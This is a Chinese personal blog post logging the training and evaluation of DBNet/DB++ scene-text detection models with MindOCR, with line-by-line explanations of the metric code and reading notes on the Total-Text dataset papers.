    box_thresh: 0.7 # box score threshold
    max_candidates: 1000
    expand_ratio: 1.5 # coefficient for expanding predictions

    ...

    optimizer:
    opt: momentum
    filter_bias_and_bn: false
    momentum: 0.9
    weight_decay: 1.0e-4

    ...

    train:
    ema: True
    ckpt_save_dir: './tmp_det_db++_r50_totaltext'
    dataset_sink_mode: True
    dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Train
    label_file: totaltext/train_det_gt.txt

    ...

    eval:
    ckpt_load_path: tmp_det_db++_r50_totaltext/best.ckpt
    dataset_sink_mode: False
    dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Test
    label_file: totaltext/test_det_gt.txt
    sample_ratio: 1.0

    ...

    开跑!(魔改的后的 db++_r50_totaltext.yaml 放在了 test_dbnet/ 下)

    1
    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    ========================================
    Distribute: False
    Model: det_resnet50-DBFPN-DBHead
    Total number of parameters: 25613196
    Total number of trainable parameters: 25559564
    Data root: ./data/ocr_datasets
    Optimizer: momentum
    Weight decay: 0.0001
    Batch size: 32
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 32x1x1=32
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 39
    Num epochs: 1200
    Clip gradient: False
    EMA: True
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    笑死真的能跑。


    7.16 结果到 800 个 epoch,需要评估的时候还是寄了。

    1
    RuntimeError: Single op compile failed, op: assign_3372008743488672465_0.

    断点重训又能跑了?好奇怪。

    发现 F 分数好低,绝,感觉这个丹炼废了,Ctrl + Z,先搁置吧。

    png

    重跑(7.26)

    试试直接给 db_r50_totaltext.yaml 里填上

    1
    2
    use_asf: True             # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF

    开跑!

    1
    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &

    分析下结果:

    png

    最好的前 10 个模型:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    [2023-07-27 05:32:23] mindocr.utils.callbacks INFO - Top K checkpoints:
    f-scorecheckpoint
    0.8546./tmp_det_db++_r50_totaltext/e584.ckpt
    0.8544./tmp_det_db++_r50_totaltext/e616.ckpt
    0.8543./tmp_det_db++_r50_totaltext/e745.ckpt
    0.8542./tmp_det_db++_r50_totaltext/e582.ckpt
    0.8542./tmp_det_db++_r50_totaltext/e623.ckpt
    0.8541./tmp_det_db++_r50_totaltext/e744.ckpt
    0.8541./tmp_det_db++_r50_totaltext/e620.ckpt
    0.8540./tmp_det_db++_r50_totaltext/e741.ckpt
    0.8540./tmp_det_db++_r50_totaltext/e615.ckpt
    0.8540./tmp_det_db++_r50_totaltext/e747.ckpt

    这个算是性能最好的一个丹了。


    原文中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (800)87.982.885.3

    查看 result.log 中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (800)86.383.985.1

    原文中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (1024)88.582.085.1

    查看 result.log 中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-50++ (1024)85.883.484.6

    db++_r50_ctw1500(8.5)

    1
    nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_ctw1500.yaml > test_db++_r50_ctw1500.log 2>&1 &

    自己的数据集(8.24)

    1
    nohup python tools/train.py --config configs/det/test_dbnet/db_r18_blendertext.yaml > test_db_r18_blendertext.log 2>&1 &

    推理(7.26、7.29)

    离线推理只能用于 昇腾310,但是服务器是 昇腾910,所以寄

    折磨完华为工作人员后说可以使用在线推理,设置好 --image_dir--det_algorithm--det_model_dir,然后开跑!

    但是发现这个推理只支持 resnet50?拉了。

    居然只支持画矩形框?天呐。

    Ground Truth

    • 0999.jpg

    jpg

    • Ground Truth
    1
    0999.jpg[{"transcription": "CHILDREN'S HOSPITAL", "points": [[57, 240], [104, 247], [151, 248], [198, 251], [245, 250], [292, 250], [340, 247], [343, 263], [295, 265], [247, 267], [199, 268], [152, 265], [104, 263], [57, 261]]}]

    官网模型

    dbnet_resnet50_td500-0d12b5e8.ckpt

    从官网下载的训练好的模型:configs/det/dbnet/README_CN.md · MindSpore Lab/mindocr - Gitee.com 里的 dbnet_resnet50_td500-0d12b5e8.ckpt

    1
    2
    3
    4
    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./dbnet_resnet50_td500-0d12b5e8.ckpt \
    --draw_img_save_dir ./inference_results/
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    [2023-07-29 10:54:44] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet50-e0733ab8.ckpt
    [2023-07-29 10:54:45] mindocr.models.utils.load_model INFO - Finish loading model checkoint from ./dbnet_resnet50_td500-0d12b5e8.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
    [2023-07-29 10:54:45] mindocr INFO - Init detection model: DB --> dbnet_resnet50. Model weights loaded from ./dbnet_resnet50_td500-0d12b5e8.ckpt
    [2023-07-29 10:54:45] mindocr INFO - Pick optimal preprocess hyper-params for det algo DB:
    {'DetResize': {'target_size': None, 'keep_ratio': True, 'limit_side_len': 960, 'limit_type': 'max', 'padding': False, 'force_divisable': True}}
    [2023-07-29 10:54:45] mindocr.data.transforms.det_transforms INFO - `limit_type` is max. Image will be resized by limiting the max side length to 960.
    [2023-07-29 10:54:45] mindocr INFO -
    Infering [1/1]: data/ocr_datasets/ctw1500/train_images/0999.jpg
    [2023-07-29 10:54:45] mindocr INFO - Original image shape: (378, 620, 3)
    [2023-07-29 10:54:45] mindocr INFO - After det preprocess: (3, 384, 640)
    [2023-07-29 10:55:08] mindocr INFO - Num detected text boxes: 2
    [2023-07-29 10:55:08] mindocr INFO - Done! Text detection results saved in ./inference_results/

    会在 inference_results/ 里获得 0999_det_res.pngdet_results.txt

    • det_results.txt
    1
    0999.jpg[[[226, 253], [342, 249], [342, 262], [226, 266]], [[67, 243], [209, 252], [208, 268], [66, 259]]]
    • 0999_det_res.png

    png

    自己的丹

    tmp_det_db_r50_totaltext/best.ckpt
    1
    2
    3
    4
    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db_r50_totaltext/inference_results/
    • det_results.txt
    1
    0999.jpg[[[221, 247], [345, 243], [346, 270], [222, 275]], [[55, 237], [210, 248], [208, 275], [53, 264]]]
    • 0999_det_res.png

    png

    居然差这么多……感觉参数不太一样……

    tmp_det_db++_r50_totaltext/best.ckpt
    1
    2
    3
    4
    python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.png \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db++_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db++_r50_totaltext/inference_results/
    • det_results.txt
    1
    0999.jpg[[[224, 248], [345, 244], [346, 267], [225, 272]], [[55, 239], [208, 247], [206, 274], [54, 266]]]

    可用参数

    查看 tools/infer/text/config.py,有如下参数可用:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    def create_parser():
    parser_config = argparse.ArgumentParser(description="Inference Config File", add_help=False)
    parser_config.add_argument(
    "-c", "--config", type=str, default="", help='YAML config file specifying default arguments (default="")'
    )

    parser = argparse.ArgumentParser(description="Inference Config Args")
    # params for prediction engine
    parser.add_argument("--mode", type=int, default=0, help="0 for graph mode, 1 for pynative mode ") # added
    parser.add_argument("--det_model_config", type=str, help="path to det model yaml config") # added
    parser.add_argument("--rec_model_config", type=str, help="path to rec model yaml config") # added

    # params for text detector
    parser.add_argument("--image_dir", type=str, help="image path or image directory")
    # parser.add_argument("--page_num", type=int, default=0)
    parser.add_argument(
    "--det_algorithm",
    type=str,
    default="DB++",
    choices=["DB", "DB++", "DB_MV3", "PSE"],
    help="detection algorithm.",
    ) # determine the network architecture
    parser.add_argument(
    "--det_amp_level",
    type=str,
    default="O0",
    choices=["O0", "O1", "O2", "O3"],
    help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    ) # added
    parser.add_argument(
    "--det_model_dir",
    type=str,
    default=None,
    help="directory containing the detection model checkpoint best.ckpt, or path to a specific checkpoint file.",
    ) # determine the network weights
    parser.add_argument(
    "--det_limit_side_len", type=int, default=960, help="side length limitation for image resizing"
    ) # increase if need
    parser.add_argument(
    "--det_limit_type",
    type=str,
    default="max",
    choices=["min", "max"],
    help="limitation type for image resize. If min, images will be resized by limiting the minimum side length "
    "to `limit_side_len` (prior to accuracy). If max, images will be resized by limiting the maximum side "
    "length to `limit_side_len` (prior to speed). Default: max",
    )
    parser.add_argument(
    "--det_box_type",
    type=str,
    default="quad",
    choices=["quad", "poly"],
    help="box type for text region representation",
    )

    # DB parmas
    parser.add_argument("--det_db_thresh", type=float, default=0.3)
    parser.add_argument("--det_db_box_thresh", type=float, default=0.6)
    parser.add_argument("--det_db_unclip_ratio", type=float, default=1.5)
    parser.add_argument("--max_batch_size", type=int, default=10)
    parser.add_argument("--use_dilation", type=str2bool, default=False)
    parser.add_argument("--det_db_score_mode", type=str, default="fast")

    # params for text recognizer
    parser.add_argument(
    "--rec_algorithm",
    type=str,
    default="CRNN",
    choices=["CRNN", "RARE", "CRNN_CH", "RARE_CH", "SVTR"],
    help="recognition algorithm",
    )
    parser.add_argument(
    "--rec_amp_level",
    type=str,
    default="O0",
    choices=["O0", "O1", "O2", "O3"],
    help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    ) # added
    parser.add_argument(
    "--rec_model_dir",
    type=str,
    help="directory containing the recognition model checkpoint best.ckpt, or path to a specific checkpoint file.",
    ) # determine the network weights
    # parser.add_argument("--rec_image_inverse", type=str2bool, default=True)
    parser.add_argument(
    "--rec_image_shape",
    type=str,
    default="3, 32, 320",
    help="C, H, W for target image shape. max_wh_ratio=W/H will be used to control the maximum width after "
    '"aspect-ratio-kept" resizing. Set W larger for longer text.',
    )

    parser.add_argument(
    "--rec_batch_mode",
    type=str2bool,
    default=True,
    help="Whether to run recognition inference in batch-mode, which is faster but may degrade the accuracy "
    "due to padding or resizing to the same shape.",
    ) # added
    parser.add_argument("--rec_batch_num", type=int, default=8)
    parser.add_argument("--max_text_length", type=int, default=25)
    parser.add_argument(
    "--rec_char_dict_path",
    type=str,
    default=None,
    help="path to character dictionary. If None, will pick according to rec_algorithm and red_model_dir.",
    )
    # uncomment it after model trained supporting space recognition.
    # parser.add_argument("--use_space_char", type=str2bool, default=True)
    parser.add_argument("--vis_font_path", type=str, default="docs/fonts/simfang.ttf")
    parser.add_argument("--drop_score", type=float, default=0.5)
    parser.add_argument(
    "--rec_gt_path", type=str, default=None, help="Path to ground truth labels of the recognition result"
    ) # added

    #
    parser.add_argument(
    "--draw_img_save_dir",
    type=str,
    default="./inference_results",
    help="Dir to save visualization and detection/recogintion/system prediction results",
    )
    parser.add_argument(
    "--save_crop_res",
    type=str2bool,
    default=False,
    help="Whether to save images cropped from text detection results.",
    )
    parser.add_argument(
    "--crop_res_save_dir", type=str, default="./output", help="Dir to save the cropped images for text boxes"
    )
    parser.add_argument(
    "--visualize_output",
    type=str2bool,
    default=False,
    help="Whether to visualize results and save the visualized image.",
    )
    parser.add_argument("--warmup", type=str2bool, default=False)

    return parser_config, parser

    评估(8.2)

    metrics/det_metrics.py 下存储着评估协议:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    from typing import List, Tuple

    import numpy as np
    from shapely.geometry import Polygon

    import mindspore as ms
    import mindspore.ops as ops
    from mindspore import Tensor, ms_function, nn

    __all__ = ["DetMetric"]

    这段代码是一个在 mindocr(MindSpore OCR)评估模型中使用的模块。以下是对代码的解释:

    • from typing import List, Tuple:导入类型提示(Type Hints),用于指定函数参数和返回值的类型。
    • import numpy as np:导入 NumPy 库,用于进行数值计算和数组操作。
    • from shapely.geometry import Polygon:从 shapely.geometry 模块中导入 Polygon 类,用于处理多边形几何对象。
    • import mindspore as ms:导入 MindSpore 库,一个开源的深度学习框架。
    • import mindspore.ops as ops:导入 MindSpore 框架的操作模块,用于执行各种操作。
    • from mindspore import Tensor, ms_function, nn:从 MindSpore 中导入 Tensor、ms_function 和 nn,它们是 MindSpore 框架提供的一些基础类和装饰器。
    • __all__ = ["DetMetric"]:定义了一个名为 __all__ 的变量,其中包含字符串 “DetMetric”。这表示该模块中只导出 DetMetric 类,其他变量和函数不会被导入。

    这段代码主要是导入所需的依赖库和模块,为之后的代码提供必要的支持。在 MindOCR 评估模型中,这些导入的模块和类可能用于数据处理、模型定义、评估和计算等方面的操作。

    1
    2
    def _get_intersect(pd, pg):
    return pd.intersection(pg).area

    这段代码定义了一个名为 _get_intersect 的函数,该函数接受两个参数 pdpg,并返回它们的交集面积。

    • pdpg 参数都是多边形(Polygon)对象,可能是由 shapely.geometry.Polygon 创建的。
    • pd.intersection(pg) 表示计算 pdpg 的交集,返回一个新的多边形对象。
    • .area 是对交集多边形对象调用的方法,用于计算其面积。
    • 函数将交集多边形的面积作为结果进行返回。

    此函数的目的是计算两个多边形的交集并返回其面积。在 MindOCR 评估模型中,这个函数可能被用于计算检测框与标注框之间的交集面积,用于评估模型的准确度和性能。

    1
    2
    def _get_iou(pd, pg):
    return pd.intersection(pg).area / pd.union(pg).area

    这段代码定义了一个名为 _get_iou 的函数,该函数接受两个参数 pdpg,并返回它们的交并比(Intersection over Union,IoU)。

    • pdpg 参数都是多边形(Polygon)对象,可能是由 shapely.geometry.Polygon 创建的。
    • pd.intersection(pg) 表示计算 pdpg 的交集,返回一个新的多边形对象。
    • .area 是对交集多边形对象和并集多边形对象进行调用的方法,分别用于计算其面积。
    • / 运算符将两个面积相除,得到交并比(IoU)。
    • 函数将交并比作为结果进行返回。

    交并比是用于衡量两个集合重叠程度的指标。在目标检测任务中,常用于评估模型检测结果与真实标注框之间的匹配程度。在该评估模型中,_get_iou 函数可能被用于计算检测框与标注框之间的交并比,以评估模型的准确度和性能。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    class DetectionIoUEvaluator:
    """
    Converts ground truth and predicted polygon locations into binary classification labels based on
    the IoU between them. This simplifies metric calculations, such as Recall, Precision, etc.
    根据真实标注和预测多边形之间的交并比(IoU),将它们转换为二元分类标签。这简化了召回率、精确率等度量计算的过程。

    Args:
    min_iou: Minimum IoU between the ground truth and prediction to be considered as a correct prediction.
    min_iou: 在考虑为正确预测的情况下,真实标注和预测之间的最小交并比(IoU)。
    min_intersect: Minimum intersection with an ignored ground truth for the prediction to be considered as ignored
    (and thus to be excluded from further calculations).
    min_intersect: 忽略的真实标注与预测之间的最小交集,以使预测被视为被忽略(从而在后续计算中排除)。
    """

    def __init__(self, min_iou: float = 0.5, min_intersect: float = 0.5):
    self._min_iou = min_iou
    self._min_intersect = min_intersect

    def __call__(self, gt: List[dict], preds: List[np.ndarray]) -> Tuple[List[int], List[int]]:
    """
    Converts GT and predicted polygons into binary classification labels, where 1 is positive and 0 is negative.
    将真实标注和预测多边形转换为二元分类标签,其中 1 表示正样本,0 表示负样本。

    Args:
    gt: list of ground truth dictionaries with keys: "polys" and "ignore".
    gt:包含真实标注字典的列表,每个字典中包含键 "polys" 和 "ignore"。其中,"polys" 表示真实标注的多边形信息,"ignore" 表示是否将该标注忽略。
    preds: list of predicted by a model polygons.
    preds:由模型预测的多边形列表。
    Returns:
    binary labels for the ground truth and predicted polygons.
    """
    # filter invalid groundtruth polygons and split them into useful and ignored
    gt_polys, gt_ignore = [], []
    for sample in gt:
    poly = Polygon(sample["polys"])
    if poly.is_valid and poly.is_simple:
    if not sample["ignore"]:
    gt_polys.append(poly)
    else:
    gt_ignore.append(poly)

    # repeat the same step for the predicted polygons
    det_polys, det_ignore = [], []
    for pred in preds:
    poly = Polygon(pred)
    if poly.is_valid and poly.is_simple:
    poly_area = poly.area
    if gt_ignore and poly_area > 0:
    for ignore_poly in gt_ignore:
    intersect_area = _get_intersect(ignore_poly, poly)
    precision = intersect_area / poly_area
    # If precision enough, append as ignored detection
    if precision > self._min_intersect:
    det_ignore.append(poly)
    break
    else:
    det_polys.append(poly)
    else:
    det_polys.append(poly)

    det_labels = [0] * len(gt_polys)
    if det_polys:
    iou_mat = np.zeros([len(gt_polys), len(det_polys)])
    det_rect_mat = np.zeros(len(det_polys), np.int8)

    for det_idx in range(len(det_polys)):
    if det_rect_mat[det_idx] == 0: # the match is not found yet
    for gt_idx in range(len(gt_polys)):
    iou_mat[gt_idx, det_idx] = _get_iou(det_polys[det_idx], gt_polys[gt_idx])
    if iou_mat[gt_idx, det_idx] > self._min_iou:
    # Mark the visit arrays
    det_rect_mat[det_idx] = 1
    det_labels[gt_idx] = 1
    break
    else:
    det_labels.append(1)

    gt_labels = [1] * len(gt_polys) + [0] * (len(det_labels) - len(gt_polys))
    return gt_labels, det_labels

    这段代码定义了一个名为 DetectionIoUEvaluator 的类,用于将真实的多边形位置和预测的多边形位置转换为二元分类标签,以便进行度量计算,如召回率、精确率等。

    该类有两个参数:

    • min_iou:真实值和预测值之间的最小交并比(Intersection over Union,IoU),用于被视为正确预测的阈值。
    • min_intersect:与被忽略的真实值的最小交集,用于被视为忽略的预测(从而在进一步计算中排除)的阈值。

    类的构造函数 __init__ 接受这两个参数,并将它们保存为类的属性。

    类还实现了 __call__ 方法,接受两个参数 gtpreds,分别表示真实的多边形和预测的多边形。

    该方法首先过滤掉无效的真实多边形,并将它们分为有效多边形和被忽略的多边形。然后对预测多边形进行相同的处理。

    接下来,对每个预测多边形,如果存在被忽略的真实多边形,并且预测多边形的面积大于 0,则计算它与每个被忽略的真实多边形的交集面积,并计算交集面积占预测多边形面积的比例(即 precision)。如果 precision 大于设定的阈值 min_intersect,则将该预测多边形视为被忽略的预测;否则将其视为有效预测。

    然后,将每个有效预测多边形与真实多边形计算交并比(IoU),如果交并比大于设定的阈值 min_iou,则将该真实多边形标记为正样本。

    最后,根据标记结果生成二元分类标签,其中 1 表示正样本,0 表示负样本。返回真实多边形的标签和预测多边形的标签。

    该类可能用于目标检测任务中,用于根据交并比将模型的预测结果与真实标注进行匹配,并计算度量指标(如召回率、精确率)以评估模型性能。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    class DetMetric(nn.Metric):
    """
    Calculate Recall, Precision, and F-score for predicted polygons given ground truth.
    给定真实标注,计算预测多边形的召回率、精确率和 F1 分数。

    Args:
    device_num: number of devices used in the metric calculation.
    """

    def __init__(self, device_num: int = 1, **kwargs):
    super().__init__()
    self._evaluator = DetectionIoUEvaluator()
    self._gt_labels, self._det_labels = [], []
    self.device_num = device_num
    self.all_reduce = None if device_num == 1 else ops.AllReduce()
    self.metric_names = ["recall", "precision", "f-score"]

    def clear(self):
    self._gt_labels, self._det_labels = [], []

    def update(self, *inputs):
    """
    Compute the metrics on a single batch of data.

    Args:
    inputs (tuple): contain two elements preds, gt
    preds (dict): text detection prediction as a dictionary with keys:
    polys: np.ndarray of shape (N, K, 4, 2)
    score: np.ndarray of shape (N, K), confidence score
    gts (tuple): ground truth
    - (polygons, ignore_tags), where polygons are in shape [num_images, num_boxes, 4, 2],
    ignore_tags are in shape [num_images, num_boxes], which can be defined by output_columns in yaml
    """
    preds, gts = inputs
    preds = preds["polys"]
    polys, ignore = gts[0].asnumpy().astype(np.float32), gts[1].asnumpy()

    for sample_id in range(len(polys)):
    gt = [{"polys": poly, "ignore": ig} for poly, ig in zip(polys[sample_id], ignore[sample_id])]
    gt_label, det_label = self._evaluator(gt, preds[sample_id])
    self._gt_labels.append(gt_label)
    self._det_labels.append(det_label)

    @ms_function
    def all_reduce_fun(self, x):
    res = self.all_reduce(x)
    return res

    def cal_matrix(self, det_lst, gt_lst):
    tp = np.sum((gt_lst == 1) * (det_lst == 1))
    fn = np.sum((gt_lst == 1) * (det_lst == 0))
    fp = np.sum((gt_lst == 0) * (det_lst == 1))
    return tp, fp, fn

    def eval(self) -> dict:
    """
    Evaluate by aggregating results from all batches.

    Returns:
    average recall, precision, f1-score of all samples.
    """
    # flatten predictions and labels into 1D-array
    self._det_labels = np.array([lbl for label in self._det_labels for lbl in label])
    self._gt_labels = np.array([lbl for label in self._gt_labels for lbl in label])

    tp, fp, fn = self.cal_matrix(self._det_labels, self._gt_labels)
    if self.all_reduce:
    tp = float(self.all_reduce_fun(Tensor(tp, ms.float32)).asnumpy())
    fp = float(self.all_reduce_fun(Tensor(fp, ms.float32)).asnumpy())
    fn = float(self.all_reduce_fun(Tensor(fn, ms.float32)).asnumpy())

    recall = _safe_divide(tp, (tp + fn))
    precision = _safe_divide(tp, (tp + fp))
    f_score = _safe_divide(2 * recall * precision, (recall + precision))
    return {"recall": recall, "precision": precision, "f-score": f_score}

    这段代码定义了一个名为 DetMetric 的类,用于计算预测的多边形与真实标注之间的召回率、精确率和 F1 分数。

    该类继承自 nn.Metric,并具有以下几个方法和属性:

    • __init__(self, device_num: int = 1, **kwargs):类的构造函数,接受一个整数参数 device_num,表示用于计算度量的设备数量。初始化了一个 DetectionIoUEvaluator 对象作为度量计算的评估器,并初始化了一些其他属性。
    • clear(self):清空保存的真实标签和预测标签。
    • update(self, *inputs):在单个数据批次上计算度量。接受两个输入参数,predsgtspreds 是一个字典,包含键为 “polys” 和 “score” 的两个项,分别表示预测的多边形和置信度得分。gts 是一个元组,其中包含真实标注的多边形和忽略标签。对每个样本,将真实标注和预测的多边形传递给 DetectionIoUEvaluator 对象进行评估,并保存得到的标签。
    • all_reduce_fun(self, x):用于分布式计算中的全局归约操作的函数。
    • cal_matrix(self, det_lst, gt_lst):计算真阳性(True Positive),假阳性(False Positive)和假阴性(False Negative)的数量。
    • eval(self) -> dict:在所有批次上评估度量,并返回平均召回率、精确率和 F1 分数。

    其中,_safe_divide 函数用于安全地进行除法运算,避免除以零的情况。

    该类可能用于目标检测任务中,通过对比预测的多边形和真实标注的多边形,计算模型的召回率、精确率和 F1 分数,以评估模型性能。

    1
    2
    3
    4
    5
    def _safe_divide(numerator, denominator, val_if_zero_divide=0.0):
    if denominator == 0:
    return val_if_zero_divide
    else:
    return numerator / denominator

    _safe_divide 是一个辅助函数,用于进行除法运算并安全处理分母为零的情况。它接受三个参数:numerator(分子)、denominator(分母)和 val_if_zero_divide(当分母为零时的返回值,默认为 0.0)。

    函数的逻辑如下:

    • 如果分母 denominator 等于零,则返回 val_if_zero_divide
    • 否则,返回 numerator / denominator

    该函数的作用是避免在除法运算中出现分母为零的错误,当分母为零时,可以选择返回一个指定的默认值,以免影响后续计算。

    BlenderText

    ]]>
    @@ -5871,7 +5871,7 @@ /posts/Paper-TotalText/ - 资源

    包含两个任务:

    Total-Text: A Comprehensive Dataset for Scene Text Detection and Recognition

    Abstract

    弯曲文本在常见的文本数据集中(ICDAR’13MSRA-TD500)几乎不存在,TotalText 数据集则有。最近,一种将文本检测作为分割问题的新解决方案已经证明了它们对多方向文本的有效性。

    1 INTRODUCTION

    ​ 市面上几乎没有弯曲文本的数据集,CUTE80 是唯一可用的,然而它只有 80 张,不好使。

    ​ 如果没有合适的数据集,解决弯曲文本检测问题的努力就很少出现。

    Total Text

    • 一个考虑到弯曲文本的场景文本数据集,填补了场景文本数据集中文本方向的空白
    • 1555 幅场景图像,4265 个文本实例,9330 个注释单词
    • 三种不同的文本方向,包括水平 horizontal多向 multi-oriented弯曲 curved

    png

    第一行是分别是 ICDAR 2013,ICDAR 2015 和 MSRA-TD500(几乎没有弯曲文本)
    第二行是 Total-Text,具有弯曲文本

    png

    现有的 Text Detection 对弯曲文本都不好使

    A. Scene Text Datasets

    • ICDARs 系列,几百到几千张图像数量不等,文本质量模糊。

    • MSRA-TD500 于 2012 年推出,旨在解决场景文本数据集中缺乏任意定向文本的问题。它有 300 个训练图像和 200 个测试图像;用最小面积矩形标注。

    • COCO-Text 于 2016 年推出,数据量大(63686 张图像和 173589 个文本标记区域),也包含水平 horizontal、多向 multi-oriented 和弯曲 curved,然而它的 Ground Truth 只有 bbox,这只对水平和垂直文本有效。

    • CUTE80 只有 80 张,数据量太小了。

    B. Scene Text Detection

    ​ 介绍各种 Scene Text Detection 的模型,略。

    3 TOTAL-TEXT DATASET

    A. Dataset Attributes

    • 弯曲文本是一个被忽视的问题 Curved text is an overlooked problem 在水平文本 ICDAR 中,性能几乎已达饱和(f-score 达到 0.9)

    • 弯曲文本观察 Curved text observation 从几何角度讲,直线沿着直线没有角度变化,因此可以描述为线性函数,y=mx+c。而曲线不是直线。它在整个线路上不受角度变化的限制。

    • **方向假设 Orientation assumption ** 目前很多 Text Detection 模型都具有方向假设,这种方式估计放到弯曲文本就寄了。

    • 以聚焦的场景文本为起点 Focused scene text as a start ICDAR 系列的文本显示质量差,作者认为文本质量稍微好一点更适合启动相关研究工作。

    • GT 越完备越好 Tighter groundtruth is better ICDAR 2015 使用四边形(四个点),COCO 使用 bbox(两个点)。在 Total Text 中,我们用紧密贴合的多边形对文本区域进行了注释。

    • 评估协议 Evaluation Protocol 与 ICDAR 数据集一样,TotalText 使用 DetEval。

    • 注释详细信息 Annotation Details 仍然保留了 bbox 的注释。Total Text 只考虑自然图像中的英文字符;其他语言、数字水印和无法阅读的文本被贴上了 “do not care” 的标签。

    B. Dataset Statstics

    • 数量优势 Strength in numbers 它总共有 9330 个注释文本,平均每个图像有 6 个实例。Total Text 中超过一半的图像具有 2 个不同的方向及以上,平均每个图像产生 1.8 个方向。数据集的收集也考虑了

    png

    • 方向多样性 Orientation diversity 大约一半的是弯曲的:

      • Horizontal Curve 水平弯曲 57.1%
      • Vertical Curve 垂直弯曲 23.5%
      • Circular 圆形 17.3%
      • Wavy 波浪形 2%

    ​ 弯曲文本通常与水平文本或多方向文本一起出现。图像中方向的混合对文本检测算法在文本方向方面实现鲁棒性和泛化提出了挑战。

    • 场景多样性 Scene diversity 弯曲文本出现的场景多样性好。

    4 SEMANTIC SEGMENTATION FOR TEXT DETECTION 用于文本检测的语义分割

    A. DeconvNet

    ​ 介绍他们提出的 DecovNet。使用最大的场景文本数据集 COCO-text 对其进行了预训练。COCO-text 中的图像被分为可阅读和难以阅读的文本,我们只在可阅读的文本上训练我们的网络,因为它与我们的数据集非常相似。

    B. Experiments

    DatasetRecallPrecisionF-score
    Total-Text0.330.400.36

    Total-Text: toward orientation robustness in scene text detection

    Abstract

    ​ 目前场景文本数据集中的文本方向还不够多样化。

    ​ 提出的 Total-Text 具有三种不同的文本方向:

    • 水平 horizontal
    • 多方向 multi-oriented
    • 曲线方向 curve-oriented

    ​ 研究了其他几个重要因素:

    • ground truth 的 practicality(实用性)和 quality(质量)
    • evaluation protocol 评估协议
    • annotation process 注释过程

    ​ 提出了一个新的场景文本检测模型作为 Total text 基线,称为 Polygon-Faster-RCNN

    1 Introduction

    png

    Total Text 的注释详细信息。a 总文本的图像,b 文本区域二进制掩码,c 字符级二进制掩码,d 固定长度多边形顶点,转录(区分大小写)和方向注释('c':弯曲,'m':多方向)

    ​ 提出的 Total-Text 包含:

    • 1555 幅场景图像,11459 个注释单词
    • GT 包括:
      • spatial location 空间位置
      • transcription 标注
      • pixel level for text detection, recognition and segmentation task 像素级的用于文本检测、识别和分割任务

    ​ 提出了新的场景文本模型:Polygon Faster RCNN(Poly FRCNN)。用于回归多边形而不是长方体参数。它能够检测所有方向的文本,并以精确的方式将其绑定。我们提出的模型在 ICDAR2013、ICDAR2015 和 Total Text 上的 F 测度分别达到 0.85、0.72 和 0.7;证明了其在具有不同属性的数据集上的有效性。

    1.1 Improved ground truth

